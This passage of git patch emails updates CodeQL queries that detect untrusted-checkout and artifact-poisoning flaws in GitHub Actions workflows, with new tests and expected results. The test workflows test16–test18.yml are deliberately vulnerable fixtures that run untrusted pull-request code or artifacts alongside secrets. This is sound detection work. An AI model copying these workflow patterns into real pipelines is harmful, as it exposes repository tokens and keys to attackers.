Step | actions/checkout | +| .github/workflows/test14.yml:101:7:105:4 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/test14.yml:101:7:105:4 | Uses Step | actions/checkout | +| .github/workflows/test14.yml:105:7:111:4 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/test14.yml:105:7:111:4 | Uses Step | actions/checkout | +| .github/workflows/test15.yml:60:7:65:4 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/test15.yml:60:7:65:4 | Uses Step | actions/checkout | +| .github/workflows/test15.yml:110:7:115:4 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/test15.yml:110:7:115:4 | Uses Step | actions/checkout | diff --git a/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.qlref b/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.qlref new file mode 100644 index 000000000000..6ce4123fa5ed --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.qlref @@ -0,0 +1 @@ +Security/CWE-829/UnversionedImmutableAction.ql \ No newline at end of file From e03ba558129fbf8de923df7b3d17b54a6fcc639d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sat, 19 Oct 2024 17:01:29 +0200 Subject: [PATCH 600/707] Account for checkout path on Untrusted Checkout Critical --- .../security/ArtifactPoisoningQuery.qll | 7 +- .../actions/security/PoisonableSteps.qll | 2 + .../CWE-829/UntrustedCheckoutCritical.ql | 33 +- .../CWE-829/.github/workflows/test16.yml | 294 ++++++++++++++++++ .../UntrustedCheckoutCritical.expected | 18 ++ 5 files changed, 347 insertions(+), 7 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test16.yml diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index 9355462962d5..48bca0e46f95 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -276,7 +276,12 @@ class ArtifactPoisoningSink extends DataFlow::Node { ) or poisonable.(UsesStep) = this.asExpr() and - download.getPath() = "GITHUB_WORKSPACE/" + ( + not poisonable instanceof LocalActionUsesStep and + download.getPath() = "GITHUB_WORKSPACE/" + or + isSubpath(poisonable.(LocalActionUsesStep).getPath(), download.getPath()) + ) ) } diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index 5e62aa675eeb..99d844bae79e 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -49,4 +49,6 @@ class LocalScriptExecutionRunStep extends PoisonableStep, Run { class LocalActionUsesStep extends PoisonableStep, UsesStep { LocalActionUsesStep() { this.getCallee().matches("./%") } + + string getPath() { result = normalizePath(this.getCallee()) } } diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql index 37628a29489a..4b87ad00c0f4 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql @@ -20,12 +20,33 @@ import codeql.actions.security.ControlChecks query predicate edges(Step a, Step b) { a.getNextStep() = b } -from PRHeadCheckoutStep checkout, PoisonableStep step, Event event +from PRHeadCheckoutStep checkout, PoisonableStep poisonable, Event event where // the checkout is followed by a known poisonable step - checkout.getAFollowingStep() = step and + checkout.getAFollowingStep() = poisonable and + ( + poisonable instanceof Run and + ( + // Check if the poisonable step is a local script execution step + // and the path of the command or script matches the path of the downloaded artifact + isSubpath(poisonable.(LocalScriptExecutionRunStep).getPath(), checkout.getPath()) + or + // Checking the path for non local script execution steps is very difficult + not poisonable instanceof LocalScriptExecutionRunStep + // Its not easy to extract the path from a non-local script execution step so skipping this check for now + // and isSubpath(poisonable.(Run).getWorkingDirectory(), checkout.getPath()) + ) + or + poisonable instanceof UsesStep and + ( + not poisonable instanceof LocalActionUsesStep and + checkout.getPath() = "GITHUB_WORKSPACE/" + or + isSubpath(poisonable.(LocalActionUsesStep).getPath(), checkout.getPath()) + ) + ) and // the checkout occurs in a privileged context - inPrivilegedContext(step, event) and - not exists(ControlCheck check | check.protects(step, event, "untrusted-checkout")) -select step, checkout, step, "Execution of untrusted code on a privileged workflow. $@", event, - event.getLocation().getFile().toString() + inPrivilegedContext(poisonable, event) and + not exists(ControlCheck check | check.protects(poisonable, event, "untrusted-checkout")) +select poisonable, checkout, poisonable, "Execution of untrusted code on a privileged workflow. $@", + event, event.getLocation().getFile().toString() diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test16.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test16.yml new file mode 100644 index 000000000000..4ceb9a4c72ff --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test16.yml @@ -0,0 +1,294 @@ +name: Post-Build +run-name: Post-Build on ${{ github.event.workflow_run.head_branch }} +on: + workflow_run: + types: [ 'completed' ] + workflows: + - Build +concurrency: + # Cancel concurrent jobs on pull_request but not push, by including the run_id in the concurrency group for the latter. + group: post-build-${{ github.event.workflow_run.event == 'push' && github.run_id || 'pr' }}-${{ github.event.workflow_run.head_branch }} + cancel-in-progress: true + +env: + COMPOSER_ROOT_VERSION: "dev-trunk" + SUMMARY: Post-Build run [#${{ github.run_id }}](${{ github.server_url }}/${{ github.repository }}/actions/runs/${{ github.run_id }}) for Build run [#${{ github.event.workflow_run.id }}](${{ github.event.workflow_run.html_url }}) + +permissions: + actions: read + contents: read + pull-requests: read + +# Note the job logic here is a bit unusual. That's because this workflow is triggered by `workflow_run`, and so is not shown on the PR by default. +# Instead we have to manually report back, including where we could normally just skip or let a failure be handled. +# - If the "Build" job failed, we need to set our status as failed too (build_failed). +# - If the find_artifact job fails for some reason, we need a step to explicitly report that back. +# - If no plugins are found, we need to explicitly report back a "skipped" status. +# - And the upgrade_test job both explicitly sets "in progress" at its start and updates at its end. +# +# If you're wanting to add a new check, you'd want to do the following: +# - Add a step in the `setup` workflow to create your check, and a corresponding output for later steps to have the ID. +# - Add a step in the `build_failed` workflow to set your run to cancelled. +# - Add a job to run whatever tests you need to run, with steps similar to the `upgrade_test` workflow's "Get token", "Notify check in progress", and "Notify final status". +# - Add a step in the `no_plugins` workflow to set your run to skipped if your job only runs when there are plugins built. + +jobs: + setup: + name: Setup + runs-on: ubuntu-latest + timeout-minutes: 2 # 2022-12-20: Seems like it should be fast. + outputs: + upgrade_check: ${{ steps.upgrade_check.outputs.id }} + steps: + - name: Log info + run: | + echo "$SUMMARY" >> $GITHUB_STEP_SUMMARY + + - uses: actions/checkout@v4 + + - name: Get token + id: get_token + uses: ./.github/actions/gh-app-token + with: + app_id: ${{ secrets.JP_LAUNCH_CONTROL_ID }} + private_key: ${{ secrets.JP_LAUNCH_CONTROL_KEY }} + + - name: 'Create "Test plugin upgrades" check' + id: upgrade_check + uses: ./.github/actions/check-run + with: + name: Test plugin upgrades + sha: ${{ github.event.workflow_run.head_sha }} + status: queued + title: Test queued... + summary: | + ${{ env.SUMMARY }} + token: ${{ steps.get_token.outputs.token }} + + build_failed: + name: Handle build failure + runs-on: ubuntu-latest + needs: setup + if: github.event.workflow_run.conclusion != 'success' + timeout-minutes: 2 # 2022-08-26: Seems like it should be fast. + steps: + - uses: actions/checkout@v4 + + - name: Get token + id: get_token + uses: ./.github/actions/gh-app-token + with: + app_id: ${{ secrets.JP_LAUNCH_CONTROL_ID }} + private_key: ${{ secrets.JP_LAUNCH_CONTROL_KEY }} + + - name: 'Mark "Test plugin upgrades" cancelled' + uses: ./.github/actions/check-run + with: + id: ${{ needs.setup.outputs.upgrade_check }} + conclusion: cancelled + title: Build failed + summary: | + ${{ env.SUMMARY }} + + Post-build run aborted because the build did not succeed. + token: ${{ steps.get_token.outputs.token }} + + find_artifact: + name: Find artifact + runs-on: ubuntu-latest + needs: setup + if: github.event.workflow_run.conclusion == 'success' + timeout-minutes: 2 # 2022-08-26: Seems like it should be fast. + outputs: + zip_url: ${{ steps.run.outputs.zip_url }} + any_plugins: ${{ steps.run.outputs.any_plugins }} + steps: + - uses: actions/checkout@v4 + + - name: Find artifact + id: run + env: + TOKEN: ${{ github.token }} + URL: ${{ github.event.workflow_run.artifacts_url }} + run: | + for (( i=1; i<=5; i++ )); do + [[ $i -gt 1 ]] && sleep 10 + echo "::group::Fetch list of artifacts (attempt $i/5)" + JSON="$(curl -v -L --get \ + --header "Authorization: token $TOKEN" \ + --url "$URL" + )" + echo "$JSON" + echo "::endgroup::" + ZIPURL="$(jq -r '.artifacts | map( select( .name == "jetpack-build" ) ) | sort_by( .created_at ) | last | .archive_download_url // empty' <<<"$JSON")" + PLUGINS="$(jq -r '.artifacts[] | select( .name == "plugins.tsv" )' <<<"$JSON")" + if [[ -n "$ZIPURL" ]]; then + break + fi + done + [[ -z "$ZIPURL" ]] && { echo "::error::Failed to find artifact."; exit 1; } + echo "Zip URL: $ZIPURL" + echo "zip_url=${ZIPURL}" >> "$GITHUB_OUTPUT" + if [[ -z "$PLUGINS" ]]; then + echo "Any plugins? No" + echo "any_plugins=false" >> "$GITHUB_OUTPUT" + else + echo "Any plugins? Yes" + echo "any_plugins=true" >> "$GITHUB_OUTPUT" + fi + + - name: Get token + id: get_token + if: ${{ ! success() }} + uses: ./.github/actions/gh-app-token + with: + app_id: ${{ secrets.JP_LAUNCH_CONTROL_ID }} + private_key: ${{ secrets.JP_LAUNCH_CONTROL_KEY }} + - name: 'Mark "Test plugin upgrades" failed' + if: ${{ ! success() }} + uses: ./.github/actions/check-run + with: + id: ${{ needs.setup.outputs.upgrade_check }} + conclusion: failure + title: Failed to find build artifact + summary: | + ${{ env.SUMMARY }} + + Post-build run aborted because the "Find artifact" step failed. + token: ${{ steps.get_token.outputs.token }} + + no_plugins: + name: Handle no-plugins + runs-on: ubuntu-latest + needs: [ setup, find_artifact ] + if: needs.find_artifact.outputs.any_plugins == 'false' + timeout-minutes: 2 # 2022-08-26: Seems like it should be fast. + steps: + - uses: actions/checkout@v4 + + - name: Get token + id: get_token + uses: ./.github/actions/gh-app-token + with: + app_id: ${{ secrets.JP_LAUNCH_CONTROL_ID }} + private_key: ${{ secrets.JP_LAUNCH_CONTROL_KEY }} + + - name: 'Mark "Test plugin upgrades" skipped' + uses: ./.github/actions/check-run + with: + id: ${{ needs.setup.outputs.upgrade_check }} + conclusion: skipped + title: No plugins were built + summary: | + ${{ env.SUMMARY }} + + Post-build run skipped because no plugins were built. + token: ${{ steps.get_token.outputs.token }} + + upgrade_test: + name: Test plugin upgrades + runs-on: ubuntu-latest + needs: [ setup, find_artifact ] + if: needs.find_artifact.outputs.any_plugins == 'true' + timeout-minutes: 15 # 2022-08-26: Successful runs seem to take about 6 minutes, but give some extra time for the downloads. + services: + db: + image: mariadb:lts + env: + MARIADB_ROOT_PASSWORD: wordpress + ports: + - 3306:3306 + options: --health-cmd="healthcheck.sh --su-mysql --connect --innodb_initialized" --health-interval=10s --health-timeout=5s --health-retries=5 + container: + image: ghcr.io/automattic/jetpack-wordpress-dev:latest + env: + WP_DOMAIN: localhost + WP_ADMIN_USER: wordpress + WP_ADMIN_EMAIL: wordpress@example.com + WP_ADMIN_PASSWORD: wordpress + WP_TITLE: Hello World + MYSQL_HOST: db:3306 + MYSQL_DATABASE: wordpress + MYSQL_USER: root + MYSQL_PASSWORD: wordpress + HOST_PORT: 80 + ports: + - 80:80 + steps: + - uses: actions/checkout@v4 + with: + path: trunk + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.workflow_run.head_commit.id }} + path: commit + + - name: Get token + id: get_token + uses: ./trunk/.github/actions/gh-app-token + env: + # Work around a weird node 16/openssl 3 issue in the docker env + OPENSSL_CONF: '/dev/null' + with: + app_id: ${{ secrets.JP_LAUNCH_CONTROL_ID }} + private_key: ${{ secrets.JP_LAUNCH_CONTROL_KEY }} + + - name: Notify check in progress + uses: ./trunk/.github/actions/check-run + with: + id: ${{ needs.setup.outputs.upgrade_check }} + status: in_progress + title: Test started... + summary: | + ${{ env.SUMMARY }} + + See run [#${{ github.run_id }}](${{ github.server_url }}/${{ github.repository }}/actions/runs/${{ github.run_id }}) for details. + token: ${{ steps.get_token.outputs.token }} + + - name: Download build artifact + env: + TOKEN: ${{ github.token }} + ZIPURL: ${{ needs.find_artifact.outputs.zip_url }} + shell: bash + run: | + for (( i=1; i<=2; i++ )); do + [[ $i -gt 1 ]] && sleep 10 + echo "::group::Downloading artifact (attempt $i/2)" + curl -v -L --get \ + --header "Authorization: token $TOKEN" \ + --url "$ZIPURL" \ + --output "artifact.zip" + echo "::endgroup::" + if [[ -e "artifact.zip" ]] && zipinfo artifact.zip &>/dev/null; then + break + fi + done + [[ ! -e "artifact.zip" ]] && { echo "::error::Failed to download artifact."; exit 1; } + unzip artifact.zip + tar --xz -xvvf build.tar.xz build + + - name: Setup WordPress + run: trunk/.github/files/test-plugin-update/setup.sh + + - name: Prepare plugin zips + id: zips + run: trunk/.github/files/test-plugin-update/prepare-zips.sh + + - name: Test upgrades + id: tests + run: trunk/.github/files/test-plugin-update/test.sh + + - name: Notify final status + if: always() + uses: ./trunk/.github/actions/check-run + with: + id: ${{ needs.setup.outputs.upgrade_check }} + conclusion: ${{ job.status }} + title: ${{ job.status == 'success' && 'Tests passed' || job.status == 'cancelled' && 'Cancelled' || 'Tests failed' }} + summary: | + ${{ env.SUMMARY }} + + ${{ steps.zips.outputs.info }}${{ steps.tests.outputs.info }} + + See run [#${{ github.run_id }}](${{ github.server_url }}/${{ github.repository }}/actions/runs/${{ github.run_id }}) for details. + token: ${{ steps.get_token.outputs.token }} diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 2a401dee18ae..2380236acca9 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -244,6 +244,24 @@ edges | .github/workflows/test15.yml:236:7:242:4 | Run Step | .github/workflows/test15.yml:242:7:250:4 | Uses Step | | .github/workflows/test15.yml:242:7:250:4 | Uses Step | .github/workflows/test15.yml:250:7:270:4 | Uses Step | | .github/workflows/test15.yml:250:7:270:4 | Uses Step | .github/workflows/test15.yml:270:7:271:45 | Run Step | +| .github/workflows/test16.yml:43:9:47:6 | Run Step | .github/workflows/test16.yml:47:9:49:6 | Uses Step | +| .github/workflows/test16.yml:47:9:49:6 | Uses Step | .github/workflows/test16.yml:49:9:56:6 | Uses Step: get_token | +| .github/workflows/test16.yml:49:9:56:6 | Uses Step: get_token | .github/workflows/test16.yml:56:9:68:2 | Uses Step: upgrade_check | +| .github/workflows/test16.yml:75:9:77:6 | Uses Step | .github/workflows/test16.yml:77:9:84:6 | Uses Step: get_token | +| .github/workflows/test16.yml:77:9:84:6 | Uses Step: get_token | .github/workflows/test16.yml:84:9:96:2 | Uses Step | +| .github/workflows/test16.yml:106:9:108:6 | Uses Step | .github/workflows/test16.yml:108:9:140:6 | Run Step: run | +| .github/workflows/test16.yml:108:9:140:6 | Run Step: run | .github/workflows/test16.yml:140:9:147:6 | Uses Step: get_token | +| .github/workflows/test16.yml:140:9:147:6 | Uses Step: get_token | .github/workflows/test16.yml:147:9:160:2 | Uses Step | +| .github/workflows/test16.yml:167:9:169:6 | Uses Step | .github/workflows/test16.yml:169:9:176:6 | Uses Step: get_token | +| .github/workflows/test16.yml:169:9:176:6 | Uses Step: get_token | .github/workflows/test16.yml:176:9:188:2 | Uses Step | +| .github/workflows/test16.yml:218:9:221:6 | Uses Step | .github/workflows/test16.yml:221:9:226:6 | Uses Step | +| .github/workflows/test16.yml:221:9:226:6 | Uses Step | .github/workflows/test16.yml:226:9:236:6 | Uses Step: get_token | +| .github/workflows/test16.yml:226:9:236:6 | Uses Step: get_token | .github/workflows/test16.yml:236:9:248:6 | Uses Step | +| .github/workflows/test16.yml:236:9:248:6 | Uses Step | .github/workflows/test16.yml:248:9:270:6 | Run Step | +| .github/workflows/test16.yml:248:9:270:6 | Run Step | .github/workflows/test16.yml:270:9:273:6 | Run Step | +| .github/workflows/test16.yml:270:9:273:6 | Run Step | .github/workflows/test16.yml:273:9:277:6 | Run Step: zips | +| .github/workflows/test16.yml:273:9:277:6 | Run Step: zips | .github/workflows/test16.yml:277:9:281:6 | Run Step: tests | +| .github/workflows/test16.yml:277:9:281:6 | Run Step: tests | .github/workflows/test16.yml:281:9:294:54 | Uses Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:14:9:25:6 | Run Step | | .github/workflows/test.yml:14:9:25:6 | Run Step | .github/workflows/test.yml:25:9:33:6 | Run Step | | .github/workflows/test.yml:25:9:33:6 | Run Step | .github/workflows/test.yml:33:9:37:34 | Run Step | From fc5a6703b34b5e50d72a670886d6af900a994ab8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sat, 19 Oct 2024 17:01:47 +0200 Subject: [PATCH 601/707] Add github.event.sender.login as an Actor source --- ql/lib/codeql/actions/security/ControlChecks.qll | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index 760efaf5e7e6..6293e4d6f3db 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll @@ -179,7 +179,8 @@ class ActorIfCheck extends ActorCheck instanceof If { .regexpFind([ "\\bgithub\\.event\\.pull_request\\.user\\.login\\b", "\\bgithub\\.event\\.head_commit\\.author\\.name\\b", - "\\bgithub\\.event\\.commits.*\\.author\\.name\\b" + "\\bgithub\\.event\\.commits.*\\.author\\.name\\b", + "\\bgithub\\.event\\.sender\\.login\\b" ], _, _) ) or From 229d42b51516df3a59a5aa600640282b4b7d3d8c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 21 Oct 2024 11:05:06 +0200 Subject: [PATCH 602/707] Add sonar-scanner-action as a poisonable step --- ql/lib/ext/config/poisonable_steps.yml | 1 + .../CWE-829/.github/workflows/test17.yml | 23 +++++++++++ .../CWE-829/.github/workflows/test18.yml | 41 +++++++++++++++++++ .../ArtifactPoisoningCritical.expected | 4 ++ .../CWE-829/ArtifactPoisoningMedium.expected | 3 ++ .../CWE-829/UnpinnedActionsTag.expected | 2 + .../UntrustedCheckoutCritical.expected | 4 ++ 7 files changed, 78 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test17.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test18.yml diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index addadd75c879..2ee9af6904ed 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -10,6 +10,7 @@ extensions: - ["ruby/setup-ruby"] - ["actions/jekyll-build-pages"] - ["qcastel/github-actions-maven/actions/maven"] + - ["sonarsource/sonarcloud-github-action"] - addsTo: pack: github/actions-all extensible: poisonableCommandsDataModel diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test17.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test17.yml new file mode 100644 index 000000000000..f679b772e340 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test17.yml @@ -0,0 +1,23 @@ +name: Sonar +on: + workflow_run: + workflows: [PR Build] + types: [completed] +jobs: + sonar: + runs-on: ubuntu-latest + timeout-minutes: 30 + if: github.event.workflow_run.conclusion == 'success' + steps: + - name: Checkout PR code + uses: actions/checkout@v3 + with: + repository: ${{ github.event.workflow_run.head_repository.full_name }} + ref: ${{ github.event.workflow_run.head_branch }} + fetch-depth: 0 + + - name: SonarCloud Scan + uses: sonarsource/sonarcloud-github-action@master + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }} diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test18.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test18.yml new file mode 100644 index 000000000000..6347db51e3c9 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test18.yml @@ -0,0 +1,41 @@ +name: Sonar +on: + workflow_run: + workflows: [PR Build] + types: [completed] +jobs: + sonar: + runs-on: ubuntu-latest + timeout-minutes: 30 + if: github.event.workflow_run.conclusion == 'success' + steps: + - name: Download artifacts + uses: actions/github-script@v6 + with: + script: | + let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: context.payload.workflow_run.id, + }); + let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => { + return artifact.name == "rsc-pr-build-artifacts" + })[0]; + let download = await github.rest.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + let fs = require('fs'); + fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/rsc-pr-build-artifacts.zip`, Buffer.from(download.data)); + + - name: Unzip artifacts + run: unzip rsc-pr-build-artifacts.zip + + - name: SonarCloud Scan + uses: sonarsource/sonarcloud-github-action@master + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }} + diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected index 5c784595dbec..53b14ee7b50e 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected @@ -14,6 +14,7 @@ edges | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | Config | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | Config | | .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | provenance | Config | +| .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:36:15:40:58 | Uses Step | provenance | Config | nodes | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | @@ -44,6 +45,8 @@ nodes | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | semmle.label | make snapshot | | .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | semmle.label | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | +| .github/workflows/test18.yml:12:15:33:12 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test18.yml:36:15:40:58 | Uses Step | semmle.label | Uses Step | subpaths #select | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | @@ -61,3 +64,4 @@ subpaths | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Uses Step | | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | make snapshot | | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | +| .github/workflows/test18.yml:36:15:40:58 | Uses Step | .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:36:15:40:58 | Uses Step | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/test18.yml:36:15:40:58 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected index e6108dddd2a5..49cee7772c0a 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected @@ -14,6 +14,7 @@ edges | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | Config | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | Config | | .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | provenance | Config | +| .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:36:15:40:58 | Uses Step | provenance | Config | nodes | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | @@ -44,5 +45,7 @@ nodes | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | semmle.label | make snapshot | | .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | semmle.label | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | +| .github/workflows/test18.yml:12:15:33:12 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test18.yml:36:15:40:58 | Uses Step | semmle.label | Uses Step | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index d05c7bebc07e..58a000efac4f 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected @@ -29,4 +29,6 @@ | .github/workflows/pr-workflow.yml:453:15:453:41 | cachix/cachix-action@master | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/cachix-action' with ref 'master', not a pinned commit hash | .github/workflows/pr-workflow.yml:453:9:459:6 | Uses Step | Uses Step | | .github/workflows/test7.yml:25:15:25:34 | pnpm/action-setup@v3 | Unpinned 3rd party Action 'Benchmark' step $@ uses 'pnpm/action-setup' with ref 'v3', not a pinned commit hash | .github/workflows/test7.yml:24:9:27:6 | Uses Step | Uses Step | | .github/workflows/test13.yml:15:13:15:53 | sushichop/action-repository-permission@v2 | Unpinned 3rd party Action 'test13.yml' step $@ uses 'sushichop/action-repository-permission' with ref 'v2', not a pinned commit hash | .github/workflows/test13.yml:14:7:20:4 | Uses Step | Uses Step | +| .github/workflows/test17.yml:20:21:20:63 | sonarsource/sonarcloud-github-action@master | Unpinned 3rd party Action 'Sonar' step $@ 